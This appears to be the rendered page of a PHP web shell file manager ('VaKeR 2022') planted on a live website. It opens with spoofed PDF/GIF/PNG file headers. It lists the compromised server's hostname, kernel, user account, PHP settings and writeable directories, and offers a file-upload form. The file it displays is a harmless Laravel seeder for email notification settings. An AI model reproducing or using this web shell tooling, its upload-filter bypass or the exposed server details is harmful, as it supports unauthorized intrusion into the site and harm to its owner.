%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/database/seeders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/database/seeders/EmailSettingSeeder.php
<?php

namespace Database\Seeders;

use App\Models\EmailNotificationSetting;
use Illuminate\Database\Seeder;

class EmailSettingSeeder extends Seeder
{

    /**
     * Run the database seeds.
     *
     * @return void
     */

    public function run()
    {
        $notificationSettings = [
            ['setting_name' => 'User Registration/Added by Admin', 'send_email' => 'yes', 'slug' => str_slug('User Registration/Added by Admin')],
            ['setting_name' => 'Employee Assign to Project', 'send_email' => 'yes', 'slug' => str_slug('Employee Assign to Project')],
            ['setting_name' => 'New Notice Published', 'send_email' => 'no', 'slug' => str_slug('New Notice Published')],
            ['setting_name' => 'User Assign to Task', 'send_email' => 'yes', 'slug' => str_slug('User Assign to Task')],
        ];

        EmailNotificationSetting::insert($notificationSettings);
    }

}

VaKeR 2022